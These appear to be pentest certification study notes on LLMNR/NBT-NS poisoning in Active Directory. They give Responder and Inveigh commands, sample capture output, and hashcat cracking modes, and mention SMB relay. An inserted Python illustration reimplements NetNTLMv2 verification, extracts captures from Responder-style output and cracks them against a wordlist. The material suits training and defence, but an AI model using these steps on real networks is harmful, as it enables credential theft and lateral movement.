OSCP-CPTS NOTES

Active Directory Attacks

Initial Foothold


Last updated 7 months ago

LLMNR/NBT-NS Poisoning

Attack Path

  • Initial connection request: the victim host tries to reach a resource by name, for example by typing \\dollarboy into Explorer. A mistyped hostname, a stale mapped drive or a shortcut to a decommissioned share is the usual trigger.

  • DNS failure: the victim's DNS server answers that \\dollarboy is unknown because no matching DNS record exists.

  • LLMNR/NBT-NS fallback: with DNS exhausted, the victim multicasts an LLMNR query (UDP 5355) and, if that also goes unanswered, broadcasts an NBT-NS query (UDP 137) on the local subnet asking, "Does anyone know \\dollarboy?" Any host on the segment may answer, and the victim has no way to verify who did.

  • Attacker responds: the attacker, running Responder on a Kali machine on the same segment, answers the query with its own IP address. The victim now believes it has found \\dollarboy.

  • Authentication request sent: the victim connects to the attacker's SMB listener and performs NTLM authentication. It does not send its password or its NT hash; it sends an NTLMv2 response, a challenge-response value computed from the user's NT hash, the username and domain, and the server challenge, which here the attacker chose.

  • Hash captured and exploited: the attacker now holds the NTLMv2 challenge-response (commonly called the "NetNTLMv2 hash"), which can be:

    • Cracked offline against a wordlist to recover the plaintext password (hashcat mode 5600). Unlike an NT hash, it cannot be used for pass-the-hash.

    • Relayed to another host where the user has rights (an SMB relay with ntlmrelayx or a similar tool, run with Responder's own SMB and HTTP servers turned off so the relay tool receives the authentication instead), provided SMB signing is not required on the target.

LLMNR/NBT-NS Poisoning from Linux

  • sudo responder -I {interface}

[+] [LLMNR]  Poisoned answer sent to 192.168.1.10 for name DOLLARBOY
[+] [SMB] NTLMv2-SSP Hash captured from 192.168.1.10
[SMB] User: DOMAIN\victim_user
[SMB] NTLMv2 Hash:
    victim_user::DOMAIN:1122334455667788:ABCDEF1234567890:010100000000000000E04BDEB8C83F18C351...

Then save the hash line in a .txt file, one capture per line. Responder also writes every capture to its logs/ directory (for example logs/SMB-NTLMv2-SSP-192.168.1.10.txt), so the line does not have to be copied from the console: victim_user::DOMAIN:1122334455667788:ABCDEF1234567890:010100000000000000E04BD..................

  • Then run hashcat to crack the hash: hashcat -m 5600 hash.txt /path/to/wordlist.txt (mode 5600 is NetNTLMv2; if Responder reports an NTLMv1 capture instead, use -m 5500).
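The following is an added example, not code from these notes and not Responder's or hashcat's own code. It shows, for the attack path above and for the capture-and-crack steps just described, what the captured line actually is: not a password hash, but an NTLMv2 challenge-response that the attacker can only recover the password from by recomputing it per candidate, which is exactly what hashcat -m 5600 does. The username, domain, password, server challenge, client blob and console lines are all constructed for the example (the page's own sample hash is truncated, so a full one is built here); the pure-Python MD4 is included because hashlib's md4 is frequently disabled under OpenSSL 3.

```python
"""NetNTLMv2 capture format and the offline cracking step behind hashcat -m 5600.
Added illustration, not code from these notes or from Responder/hashcat.
All names, challenges and log lines below are constructed for the example."""
import hmac
import re
import struct

MASK = 0xFFFFFFFF


def _rol(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320). hashlib's md4 is often disabled under OpenSSL 3."""
    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", len(data) * 8)
    h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    rounds = (
        (lambda x, y, z: (x & y) | (~x & z), list(range(16)), (3, 7, 11, 19), 0),
        (lambda x, y, z: (x & y) | (x & z) | (y & z),
         [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15], (3, 5, 9, 13), 0x5A827999),
        (lambda x, y, z: x ^ y ^ z,
         [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15], (3, 9, 11, 15), 0x6ED9EBA1),
    )
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = h
        for f, order, shifts, k in rounds:
            for i in range(16):
                a, b, c, d = d, _rol((a + f(b, c, d) + x[order[i]] + k) & MASK, shifts[i % 4]), b, c
        h = [(v + w) & MASK for v, w in zip(h, (a, b, c, d))]
    return struct.pack("<4I", *h)


def nt_hash(password: str) -> bytes:
    """NT hash = MD4 of the UTF-16LE password; the secret the victim never puts on the wire."""
    return md4(password.encode("utf-16le"))


def nt_proof_str(password, user, domain, server_challenge: bytes, blob: bytes) -> bytes:
    """NTLMv2: key = HMAC-MD5(NT hash, UPPER(user)+domain); proof = HMAC-MD5(key, challenge+blob).
    The proof is what Responder sees, so it is what hashcat has to reproduce per candidate."""
    key = hmac.new(nt_hash(password), (user.upper() + domain).encode("utf-16le"), "md5").digest()
    return hmac.new(key, server_challenge + blob, "md5").digest()


# One hashcat 5600 line: user::domain:server_challenge(16 hex):NTProofStr(32 hex):blob(hex)
HASH_RE = re.compile(r"^([^:\s]+)::([^:\s]+):([0-9A-Fa-f]{16}):([0-9A-Fa-f]{32}):([0-9A-Fa-f]+)$")


def make_capture(user, domain, password, server_challenge: bytes, blob: bytes) -> str:
    """Build the line a poisoner would log for a victim whose password we (for the demo) know."""
    proof = nt_proof_str(password, user, domain, server_challenge, blob)
    return f"{user}::{domain}:{server_challenge.hex()}:{proof.hex()}:{blob.hex()}"


def extract_hashes(console_output: str) -> dict:
    """Pull hashcat-ready lines out of Responder-style console text, first capture per account."""
    found = {}
    for line in console_output.splitlines():
        m = HASH_RE.match(line.strip())
        if m:
            found.setdefault((m.group(2).lower(), m.group(1).lower()), line.strip())
    return found


def crack(hash_line: str, wordlist):
    """What hashcat -m 5600 does: recompute NTProofStr for each candidate, stop on a match."""
    user, _, domain, chal_hex, proof_hex, blob_hex = hash_line.split(":")
    chal, proof, blob = bytes.fromhex(chal_hex), bytes.fromhex(proof_hex), bytes.fromhex(blob_hex)
    for candidate in wordlist:
        if hmac.compare_digest(nt_proof_str(candidate, user, domain, chal, blob), proof):
            return candidate
    return None


# Constructed sample: attacker-chosen 8-byte challenge and a minimal NTLMv2 client blob
# (0x0101 header, reserved, timestamp, client nonce, reserved; a real blob continues with AV pairs).
SERVER_CHALLENGE = bytes.fromhex("1122334455667788")
BLOB = bytes.fromhex("0101000000000000") + bytes(8) + bytes.fromhex("a1b2c3d4e5f60718") + bytes(4)
CAPTURE = make_capture("victim_user", "DOMAIN", "Summer2024!", SERVER_CHALLENGE, BLOB)
SAMPLE_CONSOLE = (  # constructed, mimicking Responder's console layout shown in the notes
    "[+] [LLMNR]  Poisoned answer sent to 192.168.1.10 for name DOLLARBOY\n"
    "[+] [SMB] NTLMv2-SSP Hash captured from 192.168.1.10\n"
    "[SMB] User: DOMAIN\\victim_user\n"
    "[SMB] NTLMv2 Hash:\n" + CAPTURE + "\n"
)

if __name__ == "__main__":
    for line in extract_hashes(SAMPLE_CONSOLE).values():
        print("captured:", line)
        print("cracked :", crack(line, ["Winter2023", "Password1", "Summer2024!"]))
```

Two things worth noticing when running it: changing a single byte of the server challenge or the blob changes NTProofStr completely, which is why a captured response is tied to one authentication attempt and cannot be replayed or passed like an NT hash; and the per-candidate cost is one MD4 plus two HMAC-MD5 operations, which is why NetNTLMv2 cracks quickly on a GPU but is still only as weak as the password behind it.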

LLMNR/NBT-NS Poisoning from Windows

On a Windows foothold the same attack is run with Inveigh (https://github.com/Kevin-Robertson/Inveigh). Use an elevated PowerShell session: Inveigh's packet sniffer, and therefore full functionality, needs local administrator rights.

  • PS C:\dollarboy> Import-Module .\Inveigh.ps1 -> import the Inveigh module

  • PS C:\dollarboy> Invoke-Inveigh -LLMNR Y -NBNS Y -ConsoleOutput Y
    Explanation: -LLMNR Y: enable LLMNR spoofing. -NBNS Y: enable NBNS spoofing. -ConsoleOutput Y: display captured hashes in the PowerShell console. Additionally we can use -FileOutput Y to also save them to file. Get-Inveigh -NTLMv2 lists the NTLMv2 captures so far and Stop-Inveigh shuts the listeners down.

Once an NTLMv2 hash is captured, crack it with hashcat -m 5600 exactly as in the Linux case.

+ We can also use the compiled C# version of Inveigh (Inveigh.exe, in the same repository); it is the version that is actively updated, while the PowerShell script is no longer maintained.